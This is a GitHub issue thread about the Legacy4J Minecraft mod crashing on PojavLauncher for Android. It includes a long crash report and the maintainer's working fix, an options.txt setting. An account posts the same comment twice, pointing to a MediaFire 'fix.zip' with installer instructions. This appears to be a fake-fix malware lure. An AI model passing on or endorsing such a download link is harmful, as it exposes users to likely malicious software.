### ISSUE TITLE
[Bug/Glitch] Mod Crashes when opening in Pojavlauncher (Java Edition Mobile)

### ISSUE THREAD

**Issue by Keno3704** [Wilyicaro/Legacy-Minecraft#574]
### Legacy4J Version

1.20.2-1.7.2

### Mod Loader Version

Forge-48.1.0

### Bug/Glitch Occurrence Context

Every time I try to play with the Mod on my Android, the game starts, the loading screen appears along with the Mojang and 4J Studios logos, but after downloading the native ones the game simply crashes, And if I try again it crashes before the logos even appear. Looking in the Crash Report I found a problem called "Rendering Overlay".

### Crash Report

---- Minecraft Crash Report ---- // Everything's going to plan. No, really, that was supposed to happen.  Time: 2024-08-25 02:29:30 Description: Rendering overlay  java.lang.NullPointerException: Cannot invoke "String.contains(java.lang.CharSequence)" because "this.name" is null 	at wily.legacy.client.controller.GLFWControllerHandler$1.getType(GLFWControllerHandler.java:65) ~[Legacy4J-1.20.2-1.7.2-forge.jar%23115!/:?] {re:classloading} 	at wily.legacy.client.ControlType.getActiveControllerType(ControlType.java:70) ~[Legacy4J-1.20.2-1.7.2-forge.jar%23115!/:?] {re:classloading} 	at wily.legacy.client.ControlType.getActiveType(ControlType.java:80) ~[Legacy4J-1.20.2-1.7.2-forge.jar%23115!/:?] {re:classloading} 	at wily.legacy.client.screen.ControlTooltip.lambda$setupDefaultScreen$2(ControlTooltip.java:108) ~[Legacy4J-1.20.2-1.7.2-forge.jar%23115!/:?] {re:classloading} 	at wily.legacy.client.screen.ControlTooltip$1.getIcon(ControlTooltip.java:122) ~[Legacy4J-1.20.2-1.7.2-forge.jar%23115!/:?] {re:classloading} 	at wily.legacy.client.screen.ControlTooltip$Renderer.m_88315_(ControlTooltip.java:296) ~[Legacy4J-1.20.2-1.7.2-forge.jar%23115!/:?] {re:classloading} 	at net.minecraft.client.gui.screens.Screen.handler$zgp000$renderWithTooltipReturn(Screen.java:750) ~[client-1.20.2-20230921.100330-srg.jar%23116!/:?] {re:classloading,pl:accesstransformer:B,pl:mixin:APP:legacy-common.mixins.json:ScreenMixin,pl:mixin:A,pl:runtimedistcleaner:A} 	at net.minecraft.client.gui.screens.Screen.m_280264_(Screen.java:115) ~[client-1.20.2-20230921.100330-srg.jar%23116!/:?] {re:classloading,pl:accesstransformer:B,pl:mixin:APP:legacy-common.mixins.json:ScreenMixin,pl:mixin:A,pl:runtimedistcleaner:A} 	at net.minecraft.client.gui.screens.LoadingOverlay.m_88315_(LoadingOverlay.java:571) ~[client-1.20.2-20230921.100330-srg.jar%23116!/:?] {re:classloading,pl:mixin:APP:legacy-common.mixins.json:LoadingOverlayMixin,pl:mixin:A,pl:runtimedistcleaner:A} 	at net.minecraft.client.renderer.GameRenderer.m_109093_(GameRenderer.java:955) ~[client-1.20.2-20230921.100330-srg.jar%23116!/:?] {re:classloading,pl:accesstransformer:B,pl:mixin:APP:legacy-common.mixins.json:GameRendererMixin,pl:mixin:A,pl:runtimedistcleaner:A} 	at net.minecraft.client.Minecraft.m_91383_(Minecraft.java:1211) ~[client-1.20.2-20230921.100330-srg.jar%23116!/:?] {re:classloading,pl:accesstransformer:B,pl:mixin:APP:legacy-common.mixins.json:MinecraftMixin,pl:mixin:APP:legacy.mixins.json:MinecraftMixin,pl:mixin:A,pl:runtimedistcleaner:A} 	at net.minecraft.client.Minecraft.m_91374_(Minecraft.java:781) ~[client-1.20.2-20230921.100330-srg.jar%23116!/:?] {re:classloading,pl:accesstransformer:B,pl:mixin:APP:legacy-common.mixins.json:MinecraftMixin,pl:mixin:APP:legacy.mixins.json:MinecraftMixin,pl:mixin:A,pl:runtimedistcleaner:A} 	at net.minecraft.client.main.Main.main(Main.java:221) ~[1.20.2-forge-48.1.0.jar:?] {re:classloading,pl:runtimedistcleaner:A} 	at jdk.internal.reflect.NativeMethodAccessorImpl.invoke0(Native Method) ~[?:?] {} 	at jdk.internal.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:77) ~[?:?] {} 	at jdk.internal.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43) ~[?:?] {} 	at java.lang.reflect.Method.invoke(Method.java:569) ~[?:?] {} 	at net.minecraftforge.fml.loading.targets.CommonLaunchHandler.runTarget(CommonLaunchHandler.java:98) ~[fmlloader-1.20.2-48.1.0.jar:?] {} 	at net.minecraftforge.fml.loading.targets.CommonLaunchHandler.lambda$makeService$0(CommonLaunchHandler.java:82) ~[fmlloader-1.20.2-48.1.0.jar:?] {} 	at cpw.mods.modlauncher.LaunchServiceHandlerDecorator.launch(LaunchServiceHandlerDecorator.java:17) ~[modlauncher-10.1.1.jar:?] {} 	at cpw.mods.modlauncher.LaunchServiceHandler.launch(LaunchServiceHandler.java:40) ~[modlauncher-10.1.1.jar:?] {} 	at cpw.mods.modlauncher.LaunchServiceHandler.launch(LaunchServiceHandler.java:58) ~[modlauncher-10.1.1.jar:?] {} 	at cpw.mods.modlauncher.Launcher.run(Launcher.java:96) ~[modlauncher-10.1.1.jar:?] {} 	at cpw.mods.modlauncher.Launcher.main(Launcher.java:66) ~[modlauncher-10.1.1.jar:?] {} 	at cpw.mods.modlauncher.BootstrapLaunchConsumer.accept(BootstrapLaunchConsumer.java:13) ~[modlauncher-10.1.1.jar:?] {} 	at cpw.mods.modlauncher.BootstrapLaunchConsumer.accept(BootstrapLaunchConsumer.java:10) ~[modlauncher-10.1.1.jar:?] {} 	at net.minecraftforge.bootstrap.BootstrapLauncher.main(BootstrapLauncher.java:126) ~[bootstrap-1.2.0.jar:?] {}   A detailed walkthrough of the error, its code path and all known details is as follows: ---------------------------------------------------------------------------------------  -- Head -- Thread: Render thread Suspected Mod:  	Legacy4J (legacy), Version: 1.7.2 		Issue tracker URL: https://github.com/Wilyicaro/Legacy-Minecraft/Issues 		at TRANSFORMER/legacy@1.7.2/wily.legacy.client.controller.GLFWControllerHandler$1.getType(GLFWControllerHandler.java:65) Stacktrace: 	at wily.legacy.client.controller.GLFWControllerHandler$1.getType(GLFWControllerHandler.java:65) ~[Legacy4J-1.20.2-1.7.2-forge.jar%23115!/:?] {re:classloading} 	at wily.legacy.client.ControlType.getActiveControllerType(ControlType.java:70) ~[Legacy4J-1.20.2-1.7.2-forge.jar%23115!/:?] {re:classloading} 	at wily.legacy.client.ControlType.getActiveType(ControlType.java:80) ~[Legacy4J-1.20.2-1.7.2-forge.jar%23115!/:?] {re:classloading} 	at wily.legacy.client.screen.ControlTooltip.lambda$setupDefaultScreen$2(ControlTooltip.java:108) ~[Legacy4J-1.20.2-1.7.2-forge.jar%23115!/:?] {re:classloading} 	at wily.legacy.client.screen.ControlTooltip$1.getIcon(ControlTooltip.java:122) ~[Legacy4J-1.20.2-1.7.2-forge.jar%23115!/:?] {re:classloading} 	at wily.legacy.client.screen.ControlTooltip$Renderer.m_88315_(ControlTooltip.java:296) ~[Legacy4J-1.20.2-1.7.2-forge.jar%23115!/:?] {re:classloading} 	at net.minecraft.client.gui.screens.Screen.handler$zgp000$renderWithTooltipReturn(Screen.java:750) ~[client-1.20.2-20230921.100330-srg.jar%23116!/:?] {re:classloading,pl:accesstransformer:B,pl:mixin:APP:legacy-common.mixins.json:ScreenMixin,pl:mixin:A,pl:runtimedistcleaner:A} 	at net.minecraft.client.gui.screens.Screen.m_280264_(Screen.java:115) ~[client-1.20.2-20230921.100330-srg.jar%23116!/:?] {re:classloading,pl:accesstransformer:B,pl:mixin:APP:legacy-common.mixins.json:ScreenMixin,pl:mixin:A,pl:runtimedistcleaner:A} 	at net.minecraft.client.gui.screens.LoadingOverlay.m_88315_(LoadingOverlay.java:571) ~[client-1.20.2-20230921.100330-srg.jar%23116!/:?] {re:classloading,pl:mixin:APP:legacy-common.mixins.json:LoadingOverlayMixin,pl:mixin:A,pl:runtimedistcleaner:A} -- Overlay render details -- Details: 	Overlay name: net.minecraft.client.gui.screens.LoadingOverlay Stacktrace: 	at net.minecraft.client.renderer.GameRenderer.m_109093_(GameRenderer.java:955) ~[client-1.20.2-20230921.100330-srg.jar%23116!/:?] {re:classloading,pl:accesstransformer:B,pl:mixin:APP:legacy-common.mixins.json:GameRendererMixin,pl:mixin:A,pl:runtimedistcleaner:A} 	at net.minecraft.client.Minecraft.m_91383_(Minecraft.java:1211) ~[client-1.20.2-20230921.100330-srg.jar%23116!/:?] {re:classloading,pl:accesstransformer:B,pl:mixin:APP:legacy-common.mixins.json:MinecraftMixin,pl:mixin:APP:legacy.mixins.json:MinecraftMixin,pl:mixin:A,pl:runtimedistcleaner:A} 	at net.minecraft.client.Minecraft.m_91374_(Minecraft.java:781) ~[client-1.20.2-20230921.100330-srg.jar%23116!/:?] {re:classloading,pl:accesstransformer:B,pl:mixin:APP:legacy-common.mixins.json:MinecraftMixin,pl:mixin:APP:legacy.mixins.json:MinecraftMixin,pl:mixin:A,pl:runtimedistcleaner:A} 	at net.minecraft.client.main.Main.main(Main.java:221) ~[1.20.2-forge-48.1.0.jar:?] {re:classloading,pl:runtimedistcleaner:A} 	at jdk.internal.reflect.NativeMethodAccessorImpl.invoke0(Native Method) ~[?:?] {} 	at jdk.internal.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:77) ~[?:?] {} 	at jdk.internal.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43) ~[?:?] {} 	at java.lang.reflect.Method.invoke(Method.java:569) ~[?:?] {} 	at net.minecraftforge.fml.loading.targets.CommonLaunchHandler.runTarget(CommonLaunchHandler.java:98) ~[fmlloader-1.20.2-48.1.0.jar:?] {} 	at net.minecraftforge.fml.loading.targets.CommonLaunchHandler.lambda$makeService$0(CommonLaunchHandler.java:82) ~[fmlloader-1.20.2-48.1.0.jar:?] {} 	at cpw.mods.modlauncher.LaunchServiceHandlerDecorator.launch(LaunchServiceHandlerDecorator.java:17) ~[modlauncher-10.1.1.jar:?] {} 	at cpw.mods.modlauncher.LaunchServiceHandler.launch(LaunchServiceHandler.java:40) ~[modlauncher-10.1.1.jar:?] {} 	at cpw.mods.modlauncher.LaunchServiceHandler.launch(LaunchServiceHandler.java:58) ~[modlauncher-10.1.1.jar:?] {} 	at cpw.mods.modlauncher.Launcher.run(Launcher.java:96) ~[modlauncher-10.1.1.jar:?] {} 	at cpw.mods.modlauncher.Launcher.main(Launcher.java:66) ~[modlauncher-10.1.1.jar:?] {} 	at cpw.mods.modlauncher.BootstrapLaunchConsumer.accept(BootstrapLaunchConsumer.java:13) ~[modlauncher-10.1.1.jar:?] {} 	at cpw.mods.modlauncher.BootstrapLaunchConsumer.accept(BootstrapLaunchConsumer.java:10) ~[modlauncher-10.1.1.jar:?] {} 	at net.minecraftforge.bootstrap.BootstrapLauncher.main(BootstrapLauncher.java:126) ~[bootstrap-1.2.0.jar:?] {}   -- Last reload -- Details: 	Reload number: 1 	Reload reason: initial 	Finished: Yes 	Packs: mod_resources, vanilla, file/Bare Bones 1.21.zip, file/Keno_Skin_Frog.zip Stacktrace: 	at net.minecraft.client.ResourceLoadStateTracker.m_168562_(ResourceLoadStateTracker.java:49) ~[client-1.20.2-20230921.100330-srg.jar%23116!/:?] {re:classloading} 	at net.minecraft.client.Minecraft.m_91354_(Minecraft.java:2402) ~[client-1.20.2-20230921.100330-srg.jar%23116!/:?] {re:classloading,pl:accesstransformer:B,pl:mixin:APP:legacy-common.mixins.json:MinecraftMixin,pl:mixin:APP:legacy.mixins.json:MinecraftMixin,pl:mixin:A,pl:runtimedistcleaner:A} 	at net.minecraft.client.Minecraft.m_91374_(Minecraft.java:798) ~[client-1.20.2-20230921.100330-srg.jar%23116!/:?] {re:classloading,pl:accesstransformer:B,pl:mixin:APP:legacy-common.mixins.json:MinecraftMixin,pl:mixin:APP:legacy.mixins.json:MinecraftMixin,pl:mixin:A,pl:runtimedistcleaner:A} 	at net.minecraft.client.main.Main.main(Main.java:221) ~[1.20.2-forge-48.1.0.jar:?] {re:classloading,pl:runtimedistcleaner:A} 	at jdk.internal.reflect.NativeMethodAccessorImpl.invoke0(Native Method) ~[?:?] {} 	at jdk.internal.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:77) ~[?:?] {} 	at jdk.internal.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43) ~[?:?] {} 	at java.lang.reflect.Method.invoke(Method.java:569) ~[?:?] {} 	at net.minecraftforge.fml.loading.targets.CommonLaunchHandler.runTarget(CommonLaunchHandler.java:98) ~[fmlloader-1.20.2-48.1.0.jar:?] {} 	at net.minecraftforge.fml.loading.targets.CommonLaunchHandler.lambda$makeService$0(CommonLaunchHandler.java:82) ~[fmlloader-1.20.2-48.1.0.jar:?] {} 	at cpw.mods.modlauncher.LaunchServiceHandlerDecorator.launch(LaunchServiceHandlerDecorator.java:17) ~[modlauncher-10.1.1.jar:?] {} 	at cpw.mods.modlauncher.LaunchServiceHandler.launch(LaunchServiceHandler.java:40) ~[modlauncher-10.1.1.jar:?] {} 	at cpw.mods.modlauncher.LaunchServiceHandler.launch(LaunchServiceHandler.java:58) ~[modlauncher-10.1.1.jar:?] {} 	at cpw.mods.modlauncher.Launcher.run(Launcher.java:96) ~[modlauncher-10.1.1.jar:?] {} 	at cpw.mods.modlauncher.Launcher.main(Launcher.java:66) ~[modlauncher-10.1.1.jar:?] {} 	at cpw.mods.modlauncher.BootstrapLaunchConsumer.accept(BootstrapLaunchConsumer.java:13) ~[modlauncher-10.1.1.jar:?] {} 	at cpw.mods.modlauncher.BootstrapLaunchConsumer.accept(BootstrapLaunchConsumer.java:10) ~[modlauncher-10.1.1.jar:?] {} 	at net.minecraftforge.bootstrap.BootstrapLauncher.main(BootstrapLauncher.java:126) ~[bootstrap-1.2.0.jar:?] {}   -- System Details -- Details: 	Minecraft Version: 1.20.2 	Minecraft Version ID: 1.20.2 	Operating System: Linux (aarch64) version Android-9 	Java Version: 17.0.12-internal, N/A 	Java VM Version: OpenJDK 64-Bit Server VM (mixed mode), Oracle Corporation 	Memory: 601321760 bytes (573 MiB) / 1098907648 bytes (1048 MiB) up to 1098907648 bytes (1048 MiB) 	CPUs: 8 	Processor Vendor: null 	Processor Name: AArch64 Processor rev 2 (aarch64) 	Identifier: 0x51 Family 8 Model 0x800 Stepping r10p4 	Microarchitecture: ERR 	Frequency (GHz): -0.00 	Number of physical packages: 2 	Number of physical CPUs: 8 	Number of logical CPUs: 8 	Graphics card #0 name: unknown 	Graphics card #0 vendor: unknown 	Graphics card #0 VRAM (MB): 0.00 	Graphics card #0 deviceId: unknown 	Graphics card #0 versionInfo: unknown 	Virtual memory max (MB): 2897.22 	Virtual memory used (MB): 4094.19 	Swap memory total (MB): 1024.00 	Swap memory used (MB): 827.51 	JVM Flags: 3 total; -Xms1048M -Xmx1048M -Xbootclasspath/a:/storage/emulated/0/games/PojavLauncher/caciocavallo17/cacio-shared-1.18-SNAPSHOT.jar:/storage/emulated/0/games/PojavLauncher/caciocavallo17/cacio-tta-1.18-SNAPSHOT.jar 	JVM uptime in seconds: 99.357 	Launched Version: 1.20.2 	Backend library: LWJGL version 3.3.3-snapshot 	Backend API: Adreno (TM) 509 GL version 2.1 gl4es wrapper 1.1.5, PojavLauncherTeam & ptitSeb 	Window size: 1512x756 	GL Caps: Using framebuffer using OpenGL 3.2 	GL debug messages: <disabled> 	Using VBOs: Yes 	Is Modded: Definitely; Client brand changed to 'forge' 	Type: Client (map_client.txt) 	Graphics mode: fancy 	Resource Packs: vanilla, file/Bare Bones 1.21.zip (incompatible), file/Keno_Skin_Frog.zip (incompatible) 	Current Language: none 	Locale: pt 	CPU: 8x AArch64 Processor rev 2 (aarch64) 	ModLauncher: 10.1.1 	ModLauncher launch target: forge_client 	ModLauncher naming: srg 	ModLauncher services:  		mixin-0.8.5.jar mixin PLUGINSERVICE  		eventbus-6.2.0.jar eventbus PLUGINSERVICE  		fmlloader-1.20.2-48.1.0.jar slf4jfixer PLUGINSERVICE  		fmlloader-1.20.2-48.1.0.jar object_holder_definalize PLUGINSERVICE  		fmlloader-1.20.2-48.1.0.jar runtime_enum_extender PLUGINSERVICE  		fmlloader-1.20.2-48.1.0.jar capability_token_subclass PLUGINSERVICE  		accesstransformers-8.1.1.jar accesstransformer PLUGINSERVICE  		fmlloader-1.20.2-48.1.0.jar runtimedistcleaner PLUGINSERVICE  		modlauncher-10.1.1.jar mixin TRANSFORMATIONSERVICE  		modlauncher-10.1.1.jar fml TRANSFORMATIONSERVICE  	FML Language Providers:  		minecraft@1.0 		lowcodefml@48 		javafml@null 	Mod List:  		client-1.20.2-20230921.100330-srg.jar             |Minecraft                     |minecraft                     |1.20.2              |DONE      |Manifest: a1:d4:5e:04:4f:d3:d6:e0:7b:37:97:cf:77:b0:de:ad:4a:47:ce:8c:96:49:5f:0a:cf:8c:ae:b2:6d:4b:8a:3f 		Legacy4J-1.20.2-1.7.2-forge.jar                   |Legacy4J                      |legacy                        |1.7.2               |DONE      |Manifest: NOSIGNATURE 		forge-1.20.2-48.1.0-universal.jar                 |Forge                         |forge                         |48.1.0              |DONE      |Manifest: 84:ce:76:e8:45:35:e4:0e:63:86:df:47:59:80:0f:67:6c:c1:5f:6e:5f:4d:b3:54:47:1a:9f:7f:ed:5e:f2:90 	Crash Report UUID: 1c830df0-fddd-4c11-bb65-f52a4c50b859 	FML: 48.1 	Forge: net.minecraftforge:48.1.0

### What happened wrong?

It turns out that despite being a mobile launcher, it runs MANY much heavier and more complex mods with UIs, but this one just doesn't want to run, I ask you to help me please! My dream is get It play this mod on my cell phone to finally have all the editions of Minecraft on my cell phone, which are: Java, Bedrock, China and Legacy. I already have all the other 3, I just need this one, so I ask for one more Once they fix this, they are having a lot of success with this mod, making it compatible with mobile would only make it more popular! Thanks for your attention.

**Comment by diablo00001** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by diablo00001** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by Wilyicaro** [comment]
Open your options.txt and set `selectedControllerHandler` to 2

**Comment by Keno3704** [comment]
Do I have to enter the Minecraft or mod options.txt?

**Comment by Keno3704** [comment]
Oh my God! It worked! Thank you so much man, you made my dream come true!
